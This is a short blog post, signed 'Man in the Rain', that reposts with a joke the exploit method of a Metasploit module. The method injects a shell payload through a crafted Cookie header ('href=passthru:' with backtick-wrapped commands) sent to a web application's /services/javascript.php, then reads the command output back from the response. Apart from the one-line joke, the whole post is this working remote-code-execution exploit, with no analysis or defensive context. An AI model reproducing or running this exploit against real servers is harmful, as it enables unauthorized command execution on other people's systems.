Friday, April 6, 2018

here's Hillary's favourite code :) "This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions."

def exploit
        # Make sure the URI begins with a slash
        uri = datastore['URI']
        if uri[0,1] != '/'
            uri = '/' + uri
        end
        # Make sure the URI ends without a slash, because it's already part of the URI
        if uri[-1, 1] == '/'
            uri = uri[0, uri.length-1]
        end
        function = "passthru"
        key = Rex::Text.rand_text_alpha(6)
        arguments = "echo #{key}`"+payload.raw+"`#{key}"
        res = send_request_cgi({
            'uri'     => uri + "/services/javascript.php",
            'method'  => 'POST',
            'ctype'   => 'application/x-www-form-urlencoded',
            'data'    => "app="+datastore['APP']+"&file=open_calendar.js",
            'headers' =>
            {
                'Cookie' => "href="+function+":"+arguments,
                'Connection' => 'Close',
            }
        }) #default timeout, we don't care about the response
        if (res)
            print_status("The server returned: #{res.code} #{res.message}")
        end
        resp = res.body.split(key)
        if resp and resp[1]
            print_status(resp[1])
        else
            print_error("No response found")
        end
        handler
    end

No comments:

Man in the Rain